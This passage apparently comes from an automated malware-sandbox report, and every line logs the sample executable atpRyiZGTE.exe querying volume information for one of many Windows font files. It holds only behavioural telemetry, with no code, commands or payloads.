                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\seguisb.ttf VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation
